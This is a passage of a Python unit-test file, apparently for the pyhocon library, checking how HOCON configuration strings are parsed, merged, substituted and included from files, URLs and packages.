a.d = baz
"""
)
assert config['a.b'] == "foo"
assert config['a.c'] == "foo foo"
assert config['a.d'] == "baz"
def test_comma_to_separate_expr(self):
config = ConfigFactory.parse_string(
"""
a=1,
b="abc",
c=the man,
d=woof,
a-b-c-d=test,
a b c d=test2,
"a b c d e"=test3
"""
)
assert config.get('a') == 1
assert config.get('b') == 'abc'
assert config.get('c') == 'the man'
assert config.get('d') == 'woof'
assert config.get('a-b-c-d') == 'test'
assert config.get('a b c d') == 'test2'
assert config.get('a b c d e') == 'test3'
def test_dict_merge(self):
config = ConfigFactory.parse_string(
"""
a {
d {
g.h.j.u: 5
g {
h.d: 4
}
g.h.k: f d
}
h.i.m = 7
h.i {
d: 5
}
h.i {
e:65
}
}
""")
expected_result = {
"a": {
"d": {
"g": {
"h": {
"j": {
"u": 5
},
"d": 4,
"k": "f d"
}
}
},
"h": {
"i": {
"m": 7,
"d": 5,
"e": 65
}
}
}
}
assert expected_result == config
def test_parse_with_comments(self):
config = ConfigFactory.parse_string(
"""
// comment 1
# comment 2
{
c = test // comment 0
g = 6 test # comment 0
# comment 3
a: { # comment 4
b: test, # comment 5
} # comment 6
t = [1, # comment 7
2, # comment 8
3, # comment 9
]
} # comment 10
// comment 11
// comment 12
"""
)
assert config.get('c') == 'test'
assert config.get('g') == '6 test'
assert config.get('a.b') == 'test'
assert config.get_string('a.b') == 'test'
assert config.get('t') == [1, 2, 3]
def test_missing_config(self):
config = ConfigFactory.parse_string(
"""
a = 5
"""
)
# b is not set so show raise an exception
with pytest.raises(ConfigMissingException):
config.get('b')
def test_parse_null(self):
config = ConfigFactory.parse_string(
"""
a = null
b = [null]
"""
)
assert config.get('a') is None
assert config.get('b')[0] is None
def test_parse_override(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
a.b {
c = 7
d = 8
}
}
"""
)
assert config.get('a.b.c') == 7
assert config.get('a.b.d') == 8
def test_concat_dict(self):
config = ConfigFactory.parse_string(
"""
a: {b: 1}
a: {c: 2}
b: {c: 3} {d: 4} {
c: 5
}
"""
)
assert config.get('a.b') == 1
assert config.get('a.c') == 2
assert config.get('b.c') == 5
assert config.get('b.d') == 4
def test_concat_string(self):
config = ConfigFactory.parse_string(
"""
a = a b c
b = 5 b
c = b 7
"""
)
assert config.get('a') == 'a b c'
assert config.get('b') == '5 b'
assert config.get('c') == 'b 7'
def test_concat_list(self):
config = ConfigFactory.parse_string(
"""
a = [1, 2] [3, 4] [
5,
6
]
"""
)
assert config.get('a') == [1, 2, 3, 4, 5, 6]
assert config.get_list('a') == [1, 2, 3, 4, 5, 6]
def test_bad_concat(self):
ConfigFactory.parse_string('a = 45\n')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = [4] "4"')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = "4" [5]')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = {b: 5} "4"')
def test_string_substitutions(self):
config1 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = str
e = "str "
}
}
d = ${a.b.c}
f = ${a.b.e}
}
"""
)
assert config1.get('a.b.c') == 'str'
assert config1.get('d') == 'str'
assert config1.get('f') == 'str '
config2 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = str
e = "str "
}
}
d = test ${a.b.c}
f = test ${a.b.e}
}
"""
)
assert config2.get('a.b.c') == 'str'
assert config2.get('d') == 'test str'
assert config2.get('f') == 'test str '
config3 = ConfigFactory.parse_string(
u"""
{
a: {
b: {
c = str
e = "str "
}
}
d = test ${a.b.c} me
f = test ${a.b.e} me
}
"""
)
assert config3.get('a.b.c') == 'str'
assert config3.get('d') == 'test str me'
assert config3.get('f') == 'test str me'
def test_string_substitutions_with_no_space(self):
config = ConfigFactory.parse_string(
"""
app.heap_size = 128
app.java_opts = [
-Xms${app.heap_size}m
-Xmx${app.heap_size}m
]
"""
)
assert config.get('app.java_opts') == [
'-Xms128m',
'-Xmx128m'
]
def test_int_substitutions(self):
config1 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = ${a.b.c}
}
"""
)
assert config1.get('a.b.c') == 5
assert config1.get('d') == 5
config2 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = test ${a.b.c}
}
"""
)
assert config2.get('a.b.c') == 5
assert config2.get('d') == 'test 5'
config3 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = test ${a.b.c} me
}
"""
)
assert config3.get('a.b.c') == 5
assert config3.get('d') == 'test 5 me'
def test_cascade_string_substitutions(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = ${e}
}
}
d = test ${a.b.c} me
e = 7
}
"""
)
assert config.get('a.b.c') == 7
assert config.get('d') == 'test 7 me'
def test_multiple_substitutions(self):
config = ConfigFactory.parse_string(
"""
a = 5
b=${a}${a}
c=${a} ${a}
"""
)
assert config == {
'a': 5,
'b': '55',
'c': '5 5'
}
def test_dict_substitutions(self):
config = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = ${data-center-generic} {name = "east"}
"""
)
assert config.get('data-center-east.cluster-size') == 6
assert config.get('data-center-east.name') == 'east'
config2 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic}
"""
)
assert config2.get('data-center-east.cluster-size') == 6
assert config2.get('data-center-east.name') == 'east'
config3 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" }
"""
)
assert config3.get('data-center-east.cluster-size') == 9
assert config3.get('data-center-east.name') == 'east'
assert config3.get('data-center-east.opts') == '-Xmx4g'
config4 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic}
data-center-east-prod = ${data-center-east} {tmpDir=/tmp}
"""
)
assert config4.get('data-center-east.cluster-size') == 6
assert config4.get('data-center-east.name') == 'east'
assert config4.get('data-center-east-prod.cluster-size') == 6
assert config4.get('data-center-east-prod.tmpDir') == '/tmp'
config5 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = ${data-center-generic}
data-center-east = { name = "east" }
"""
)
assert config5['data-center-east'] == {
'name': 'east',
'cluster-size': 6
}
config6 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = { name = "east" }
data-center-east = ${data-center-generic}
"""
)
assert config6['data-center-east'] == {
'name': 'east',
'cluster-size': 6
}
def test_dos_chars_with_unquoted_string_noeol(self):
config = ConfigFactory.parse_string("foo = bar")
assert config['foo'] == 'bar'
def test_dos_chars_with_quoted_string_noeol(self):
config = ConfigFactory.parse_string('foo = "5"')
assert config['foo'] == '5'
def test_dos_chars_with_triple_quoted_string_noeol(self):
config = ConfigFactory.parse_string('foo = """5"""')
assert config['foo'] == '5'
def test_dos_chars_with_int_noeol(self):
config = ConfigFactory.parse_string("foo = 5")
assert config['foo'] == 5
def test_dos_chars_with_float_noeol(self):
config = ConfigFactory.parse_string("foo = 5.0")
assert config['foo'] == 5.0
def test_list_substitutions(self):
config = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = ${common_modules} [java]
"""
)
assert config.get('host_modules') == ['php', 'python', 'java']
config2 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules}
"""
)
assert config2.get('host_modules') == ['java', 'php', 'python']
config3 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules} [perl]
"""
)
assert config3.get('common_modules') == ['php', 'python']
assert config3.get('host_modules') == ['java', 'php', 'python', 'perl']
config4 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules} [perl]
full_modules = ${host_modules} [c, go]
"""
)
assert config4.get('common_modules') == ['php', 'python']
assert config4.get('host_modules') == ['java', 'php', 'python', 'perl']
assert config4.get('full_modules') == ['java', 'php', 'python', 'perl', 'c', 'go']
def test_list_element_substitution(self):
config = ConfigFactory.parse_string(
"""
main_language = php
languages = [java, ${main_language}]
"""
)
assert config.get('languages') == ['java', 'php']
def test_substitution_list_with_append(self):
config = ConfigFactory.parse_string(
"""
application.foo = 128mm
application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}]
application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"]
""")
assert config["application.large-jvm-opts"] == [
'-XX:+UseParNewGC',
'-Xm16g',
'128mm'
]
assert config["application.large-jvm-opts2"] == [
'-Xm16g',
'128mm',
'-XX:+UseParNewGC',
]
def test_substitution_list_with_append_substitution(self):
config = ConfigFactory.parse_string(
"""
application.foo = 128mm
application.default-jvm-opts = ["-XX:+UseParNewGC"]
application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}]
application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts}
""")
assert config["application.large-jvm-opts"] == [
'-XX:+UseParNewGC',
'-Xm16g',
'128mm'
]
assert config["application.large-jvm-opts2"] == [
'-Xm16g',
'128mm',
'-XX:+UseParNewGC'
]
def test_non_existent_substitution(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = ${non_existent}
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = abc ${non_existent}
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = ${non_existent} abc
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = abc ${non_existent} def
"""
)
def test_non_compatible_substitution(self):
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = 55 ${common_modules}
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = ${common_modules} 55
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules} bb
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules}
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = ${common_modules} aa
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules} bb
"""
)
def test_self_ref_substitution_array(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x = ${x} [3,4]
x = [-1, 0] ${x} [5, 6]
x = [-3, -2] ${x}
"""
)
assert config.get("x") == [-3, -2, -1, 0, 1, 2, 3, 4, 5, 6]
def test_self_append_array(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x += [3,4]
"""
)
assert config.get("x") == [1, 2, 3, 4]
def test_self_append_string(self):
'''
Should be equivalent to
x = abc
x = ${?x} def
'''
config = ConfigFactory.parse_string(
"""
x = abc
x += def
"""
)
assert config.get("x") == "abc def"
def test_self_append_non_existent_string(self):
'''
Should be equivalent to x = ${?x} def
'''
config = ConfigFactory.parse_string(
"""
x += def
"""
)
assert config.get("x") == " def"
def test_self_append_nonexistent_array(self):
config = ConfigFactory.parse_string(
"""
x += [1,2]
"""
)
assert config.get("x") == [1, 2]
def test_self_append_object(self):
config = ConfigFactory.parse_string(
"""
x = {a: 1}
x += {b: 2}
"""
)
assert config.get("x") == {'a': 1, 'b': 2}
def test_self_append_nonexistent_object(self):
config = ConfigFactory.parse_string(
"""
x += {a: 1}
"""
)
assert config.get("x") == {'a': 1}
def test_self_ref_substitution_array_to_dict(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x = {x: [3,4]}
x = {y: [5,6]}
x = {z: ${x}}
"""
)
assert config.get("x.x") == [3, 4]
assert config.get("x.y") == [5, 6]
assert config.get("x.z") == {'x': [3, 4], 'y': [5, 6]}
def test_self_ref_substitiotion_dict_in_array(self):
config = ConfigFactory.parse_string(
"""
x = {x: [3,4]}
x = [${x}, 2, 3]
"""
)
(one, two, three) = config.get("x")
assert one == {'x': [3, 4]}
assert two == 2
assert three == 3
def test_self_ref_substitution_dict_path(self):
config = ConfigFactory.parse_string(
"""
x = {y: {z: 1}}
x = ${x.y}
"""
)
assert config.get("x.y") == {'z': 1}
assert config.get("x.z") == 1
assert set(config.get("x").keys()) == set(['y', 'z'])
def test_self_ref_substitution_dict_path_hide(self):
config = ConfigFactory.parse_string(
"""
x = {y: {y: 1}}
x = ${x.y}
"""
)
assert config.get("x.y") == 1
assert set(config.get("x").keys()) == set(['y'])
def test_self_ref_substitution_dict_recurse(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x}
"""
)
def test_self_ref_substitution_dict_recurse2(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x}
x = ${x}
"""
)
def test_self_ref_substitution_dict_merge(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
foo : { a : { c : 1 } }
foo : ${foo.a}
foo : { a : 2 }
"""
)
assert config.get('foo') == {'a': 2, 'c': 1}
assert set(config.keys()) == set(['foo'])
def test_self_ref_substitution_dict_otherfield(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
bar : {
foo : 42,
baz : ${bar.foo}
}
"""
)
assert config.get("bar") == {'foo': 42, 'baz': 42}
assert set(config.keys()) == set(['bar'])
def test_self_ref_substitution_dict_otherfield_merged_in(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
bar : {
foo : 42,
baz : ${bar.foo}
}
bar : { foo : 43 }
"""
)
assert config.get("bar") == {'foo': 43, 'baz': 43}
assert set(config.keys()) == set(['bar'])
def test_self_ref_substitution_dict_otherfield_merged_in_mutual(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
// bar.a should end up as 4
bar : { a : ${foo.d}, b : 1 }
bar.b = 3
// foo.c should end up as 3
foo : { c : ${bar.b}, d : 2 }
foo.d = 4
"""
)
assert config.get("bar") == {'a': 4, 'b': 3}
assert config.get("foo") == {'c': 3, 'd': 4}
assert set(config.keys()) == set(['bar', 'foo'])
def test_self_ref_substitution_string_opt_concat(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
a = ${?a}foo
"""
)
assert config.get("a") == 'foo'
assert set(config.keys()) == set(['a'])
def test_self_ref_substitution_dict_recurse_part(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x} {y: 1}
x = ${x.y}
"""
)
def test_self_ref_substitution_object(self):
config = ConfigFactory.parse_string(
"""
x = {a: 1, b: 2}
x = ${x} {c: 3}
x = {z: 0} ${x}
x = {y: -1} ${x} {d: 4}
"""
)
assert config.get("x") == {'a': 1, 'b': 2, 'c': 3, 'z': 0, 'y': -1, 'd': 4}
def test_self_ref_child(self):
config = ConfigFactory.parse_string(
"""
a.b = 3
a.b = ${a.b}
a.b = ${a.b}
a.c = [1,2]
a.c = ${a.c}
a.d = {foo: bar}
a.d = ${a.d}
"""
)
assert config.get("a") == {'b': 3, 'c': [1, 2], 'd': {'foo': 'bar'}}
def test_concat_multi_line_string(self):
config = ConfigFactory.parse_string(
"""
common_modules = perl \
java \
python
"""
)
assert [x.strip() for x in config['common_modules'].split() if x.strip(' ') != ''] == ['perl', 'java', 'python']
def test_concat_multi_line_list(self):
config = ConfigFactory.parse_string(
"""
common_modules = [perl] \
[java] \
[python]
"""
)
assert config['common_modules'] == ['perl', 'java', 'python']
def test_concat_multi_line_dict(self):
config = ConfigFactory.parse_string(
"""
common_modules = {a:perl} \
{b:java} \
{c:python}
"""
)
assert config['common_modules'] == {'a': 'perl', 'b': 'java', 'c': 'python'}
def test_parse_URL_from_samples(self):
config = ConfigFactory.parse_URL("file:samples/aws.conf")
assert config.get('data-center-generic.cluster-size') == 6
assert config.get('large-jvm-opts') == ['-XX:+UseParNewGC', '-Xm16g']
def test_parse_URL_from_invalid(self):
config = ConfigFactory.parse_URL("https://nosuchurl")
assert config == []
def test_include_dict_from_samples(self):
config = ConfigFactory.parse_file("samples/animals.conf")
assert config.get('cat.garfield.say') == 'meow'
assert config.get('dog.mutt.hates.garfield.say') == 'meow'
def test_include_glob_dict_from_samples(self):
config = ConfigFactory.parse_file("samples/all_animals.conf")
assert config.get('animals.garfield.say') == 'meow'
assert config.get('animals.mutt.hates.garfield.say') == 'meow'
def test_include_glob_list_from_samples(self):
config = ConfigFactory.parse_file("samples/all_bars.conf")
bars = config.get_list('bars')
assert len(bars) == 10
names = {bar['name'] for bar in bars}
types = {bar['type'] for bar in bars if 'type' in bar}
print(types, '(((((')
assert 'Bloody Mary' in names
assert 'Homer\'s favorite coffee' in names
assert 'milk' in types
def test_list_of_dicts(self):
config = ConfigFactory.parse_string(
"""
a: [
{a: 1, b: 2},
{a: 3, c: 4},
]
"""
)
assert config['a'] == [
{'a': 1, 'b': 2},
{'a': 3, 'c': 4}
]
def test_list_of_lists(self):
config = ConfigFactory.parse_string(
"""
a: [
[1, 2]
[3, 4]
]
"""
)
assert config['a'] == [
[1, 2],
[3, 4]
]
def test_list_of_dicts_with_merge(self):
config = ConfigFactory.parse_string(
"""
b = {f: 4}
a: [
${b} {a: 1, b: 2},
{a: 3, c: 4} ${b},
{a: 3} ${b} {c: 6},
]
"""
)
assert config['a'] == [
{'a': 1, 'b': 2, 'f': 4},
{'a': 3, 'c': 4, 'f': 4},
{'a': 3, 'c': 6, 'f': 4}
]
def test_list_of_lists_with_merge(self):
config = ConfigFactory.parse_string(
"""
b = [5, 6]
a: [
${b} [1, 2]
[3, 4] ${b}
[1, 2] ${b} [7, 8]
]
"""
)
assert config['a'] == [
[5, 6, 1, 2],
[3, 4, 5, 6],
[1, 2, 5, 6, 7, 8]
]
def test_invalid_assignment(self):
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string('common_modules [perl]')
with pytest.raises(ParseException):
ConfigFactory.parse_string('common_modules {} {perl: 1}')
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string(
"""
a = {f: 5}
common_modules ${a} {perl: 1}
""")
def test_invalid_dict(self):
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string(
"""
a = {
f: 5
g
}
""")
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string('a = {g}')
def test_include_file(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('[1, 2]')
fdin.flush()
config1 = ConfigFactory.parse_string(
"""
a: [
include "{tmp_file}"
]
""".format(tmp_file=fdin.name)
)
assert config1['a'] == [1, 2]
config2 = ConfigFactory.parse_string(
"""
a: [
include file("{tmp_file}")
]
""".format(tmp_file=fdin.name)
)
assert config2['a'] == [1, 2]
config3 = ConfigFactory.parse_string(
"""
a: [
include url("file://{tmp_file}")
]
""".format(tmp_file=fdin.name)
)
assert config3['a'] == [1, 2]
def test_include_missing_file(self):
config1 = ConfigFactory.parse_string(
"""
a: [
include "dummy.txt"
3
4
]
"""
)
assert config1['a'] == [3, 4]
def test_include_required_file(self):
config = ConfigFactory.parse_string(
"""
a {
include required("samples/animals.d/cat.conf")
t = 2
}
"""
)
expected = {
'a': {
'garfield': {
'say': 'meow'
},
't': 2
}
}
assert expected == config
config2 = ConfigFactory.parse_string(
"""
a {
include required(file("samples/animals.d/cat.conf"))
t = 2
}
"""
)
assert expected == config2
def test_include_missing_required_file(self):
with pytest.raises(IOError):
ConfigFactory.parse_string(
"""
a: [
include required("dummy.txt")
3
4
]
"""
)
def test_resolve_package_path(self):
path = ConfigParser.resolve_package_path("pyhocon:config_parser.py")
assert os.path.exists(path)
def test_resolve_package_path_format(self):
with pytest.raises(ValueError):
ConfigParser.resolve_package_path("pyhocon/config_parser.py")
def test_resolve_package_path_missing(self):
with pytest.raises(ImportError):
ConfigParser.resolve_package_path("non_existent_module:foo.py")
def test_include_package_file(self, monkeypatch):
temp_dir = tempfile.mkdtemp()
try:
module_dir = os.path.join(temp_dir, 'my_module')
module_conf = os.path.join(module_dir, 'my.conf')
# create the module folder and necessary files (__init__ and config)
os.mkdir(module_dir)
open(os.path.join(module_dir, '__init__.py'), 'a').close()
with open(module_conf, 'w') as fdin:
fdin.write("{c: 3}")
# add the temp dir to sys.path so that 'my_module' can be discovered
monkeypatch.syspath_prepend(temp_dir)
# load the config and include the other config file from 'my_module'
config = ConfigFactory.parse_string(
"""
a: 1
b: 2
include package("my_module:my.conf")
"""
)
# check that the contents of both config files are available
assert dict(config.as_plain_ordered_dict()) == {'a': 1, 'b': 2, 'c': 3}
finally:
shutil.rmtree(temp_dir, ignore_errors=True)
def test_include_dict(self):
expected_res = {
'a': 1,
'b': 2,
'c': 3,
'd': 4
}
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('{a: 1, b: 2}')
fdin.flush()
config1 = ConfigFactory.parse_string(
"""
a: {{
include "{tmp_file}"
c: 3
d: 4
}}
""".format(tmp_file=fdin.name)
)
assert config1['a'] == expected_res
config2 = ConfigFactory.parse_string(
"""
a: {{
c: 3
d: 4
include "{tmp_file}"
}}
""".format(tmp_file=fdin.name)
)
assert config2['a'] == expected_res
config3 = ConfigFactory.parse_string(
"""
a: {{
c: 3
include "{tmp_file}"
d: 4
}}
""".format(tmp_file=fdin.name)
)
assert config3['a'] == expected_res
def test_include_substitution(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('y = ${x}')
fdin.flush()
config = ConfigFactory.parse_string(
"""
include "{tmp_file}"
x = 42
""".format(tmp_file=fdin.name)
)
assert config['x'] == 42
assert config['y'] == 42
@pytest.mark.xfail
def test_include_substitution2(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('{ x : 10, y : ${x} }')
fdin.flush()
config = ConfigFactory.parse_string(
"""
{
a : { include """ + '"' + fdin.name + """" }
a : { x : 42 }
}
"""
)
assert config['a']['x'] == 42
assert config['a']['y'] == 42
def test_var_with_include_keyword(self):
config = ConfigFactory.parse_string(
"""
include-database=true
""")
assert config == {
'include-database': True
}
def test_substitution_override(self):
config = ConfigFactory.parse_string(
"""
database {
host = localhost
port = 5432
user = people
name = peopledb
pass = peoplepass
}
user=test_user
pass=test_pass
database {
user = ${user}
pass = ${pass}
}
""")
assert config['database.user'] == 'test_user'
assert config['database.pass'] == 'test_pass'
def test_substitution_flat_override(self):
config = ConfigFactory.parse_string(
"""
database {
name = peopledb
pass = peoplepass
name = ${?NOT_EXISTS}
pass = ${?NOT_EXISTS}
}
""")
assert config['database.name'] == 'peopledb'
assert config['database.pass'] == 'peoplepass'
def test_substitution_multiple_override(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: foo
c: ${a} ${b}
c: ${b} ${a}
d: ${a} ${b}
d: ${a} bar
""")
assert config['c'] == 'foo 1'
assert config['d'] == '1 bar'
def test_substitution_nested_override(self):
config = ConfigFactory.parse_string(
"""
database {
name = peopledb
pass = peoplepass
}
database {
name = ${?user}
pass = ${?pass}
}
""")
assert config['database.name'] == 'peopledb'
assert config['database.pass'] == 'peoplepass'
def test_optional_with_merge(self):
unresolved = ConfigFactory.parse_string(
"""
foo: 42
foo: ${?a}
""", resolve=False)
source = ConfigFactory.parse_string(
"""
b: 14
""")
config = unresolved.with_fallback(source)
assert config['foo'] == 42
config = source.with_fallback(unresolved)
assert config['foo'] == 42
def test_fallback_with_resolve(self):
config3 = ConfigFactory.parse_string("c=5")
config2 = ConfigFactory.parse_string("b=${c}", resolve=False)
config1 = ConfigFactory.parse_string("a=${b}", resolve=False) \
.with_fallback(config2, resolve=False) \
.with_fallback(config3)
assert {'a': 5, 'b': 5, 'c': 5} == config1
def test_optional_substitution(self):
config = ConfigFactory.parse_string(
"""
a = 45
b = ${?c}
d = ${?c} 4
e = ${?a}
g = ${?c1} ${?c2}
h = ${?c1} ${?c2} 1
""")
assert 'b' not in config
assert config['d'] == 4
assert config['e'] == 45
assert 'g' not in config
assert config['h'] == 1
def test_cascade_optional_substitution(self):
config = ConfigFactory.parse_string(
"""
num = 3
retries_msg = You have ${num} retries
retries_msg = ${?CUSTOM_MSG}
""")
assert config == {
'num': 3,
'retries_msg': 'You have 3 retries'
}
def test_substitution_cycle(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
a = ${b}
b = ${c}
c = ${a}
""")
def test_assign_number_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
4
b = # test
# test2
5
c =
6
"""
)
assert config['a'] == 4
assert config['b'] == 5
assert config['c'] == 6
def test_assign_int(self):
config = ConfigFactory.parse_string(
"""
short = 12
long = 12321321837612378126213217321
negative = -15
"""
)
# on python 3 long will be an int but on python 2 long with be a long
assert config['short'] == 12
assert isinstance(config['short'], int)
assert config['long'] == 12321321837612378126213217321
assert isinstance(config['negative'], int)
assert config['negative'] == -15
def test_assign_float(self):
config = ConfigFactory.parse_string(
"""
a = 121.22
b = -121.22
c = .54
d = -.54
"""
)
# on python 3 long will be an int but on python 2 long with be a long
assert config['a'] == 121.22
assert config['b'] == -121.22
assert config['c'] == .54
assert config['d'] == -.54
def test_sci_real(self):
"""
Test scientific expression of number
"""
config = ConfigFactory.parse_string(
"""
short = 12.12321
long1 = 121.22E3423432
neg_long1 = 121.22E-1
long2 = 121.22e3423432
neg_long2 = 121.22e-3
"""
)
# on python 3 long will be an int but on python 2 long with be a long
assert config['short'] == 12.12321
assert config['long1'] == 121.22E3423432
assert config['neg_long1'] == 121.22E-1
assert config['long2'] == 121.22E3423432
assert config['neg_long2'] == 121.22E-3
def test_assign_strings_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
"a"
b = # test
# test2
"b"
c =
"c"
"""
)
assert config['a'] == 'a'
assert config['b'] == 'b'
assert config['c'] == 'c'
def test_assign_list_numbers_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
[
1,
2,
]
b = # test
# test2
[
3,
4,]
c =
[
5,
6
]
"""
)
assert config['a'] == [1, 2]
assert config['b'] == [3, 4]
assert config['c'] == [5, 6]
def test_assign_list_strings_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
[
"a",
"b",
]
b = # test
# test2
[
"c",
"d",]
c =
[
"e",
"f"
]
"""
)
assert config['a'] == ['a', 'b']
assert config['b'] == ['c', 'd']
assert config['c'] == ['e', 'f']
def test_assign_dict_strings_with_equal_sign_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
{
a: 1,
b: 2,
}
b = # test
# test2
{
c: 3,
d: 4,}
c =
{
e: 5,
f: 6
}
"""
)
assert config['a'] == {'a': 1, 'b': 2}
assert config['b'] == {'c': 3, 'd': 4}
assert config['c'] == {'e': 5, 'f': 6}
def test_assign_dict_strings_no_equal_sign_with_eol(self):
config = ConfigFactory.parse_string(
"""
a
{
a: 1,
b: 2,
}
b # test
# test2
{
c: 3,
d: 4,}
c
{
e: 5,
f: 6
}
"""
)
assert config['a'] == {'a': 1, 'b': 2}
assert config['b'] == {'c': 3, 'd': 4}
assert config['c'] == {'e': 5, 'f': 6}
def test_substitutions_overwrite(self):
config1 = ConfigFactory.parse_string(
"""
a = 123
a = ${?test}
a = 5
"""
)
assert config1['a'] == 5
config2 = ConfigFactory.parse_string(
"""
{
database {
host = "localhost"
port = 8000
url = ${database.host}":"${database.port}
}
database {
host = ${?DB_HOST}
}
database {
host = "other.host.net"
port = 433
}
}
"""
)
assert config2['database']['host'] == 'other.host.net'
assert config2['database']['port'] == 433
assert config2['database']['url'] == 'other.host.net:433'
def test_fallback_substitutions_overwrite(self):
config1 = ConfigFactory.parse_string(
"""
a = {
b: 1
c: 2
}
"""
)
config2 = ConfigFactory.parse_string(
"""
a.b = 4
a.d = 3
"""
)
config3 = config1.with_fallback(config2)
assert config3['a'] == {
'b': 1,
'c': 2,
'd': 3
}
config4 = ConfigFactory.parse_string(
"""
name: foo
"""
)
config5 = ConfigFactory.parse_string(
u"""
longName: "long "${?name}
""",
resolve=False
)
config6 = config4.with_fallback(config5)
assert config6 == {
'longName': 'long foo',
'name': 'foo'
}
def test_fallback_substitutions_overwrite_file(self):
config1 = ConfigFactory.parse_string(
"""
{
data-center-generic = { cluster-size: 8 }
misc = "mist"
}
"""
)
# use unicode path here for regression testing https://github.com/chimpler/pyhocon/issues/44
config2 = config1.with_fallback(u'samples/aws.conf')
assert config2 == {
'data-center-generic': {'cluster-size': 8},
'data-center-east': {'cluster-size': 8, 'name': 'east'},
'misc': 'mist',
'default-jvm-opts': ['-XX:+UseParNewGC'],
'large-jvm-opts': ['-XX:+UseParNewGC', '-Xm16g']
}
def test_fallback_self_ref_substitutions_append(self):
config1 = ConfigFactory.parse_string(
"""
list = [ 1, 2, 3 ]
"""
)
config2 = ConfigFactory.parse_string(
"""
list = ${list} [ 4, 5, 6 ]
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("list") == [1, 2, 3, 4, 5, 6]
def test_fallback_self_ref_substitutions_append_plus_equals(self):
config1 = ConfigFactory.parse_string(
"""
list = [ 1, 2, 3 ]
"""
)
config2 = ConfigFactory.parse_string(
"""
list += [ 4, 5, 6 ]
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("list") == [1, 2, 3, 4, 5, 6]
def test_self_merge_ref_substitutions_object(self):
config1 = ConfigFactory.parse_string(
"""
a : { }
b : 1
c : ${a} { d : [ ${b} ] }
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
e : ${a} {
}
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
assert merged.get("c.d") == [1]
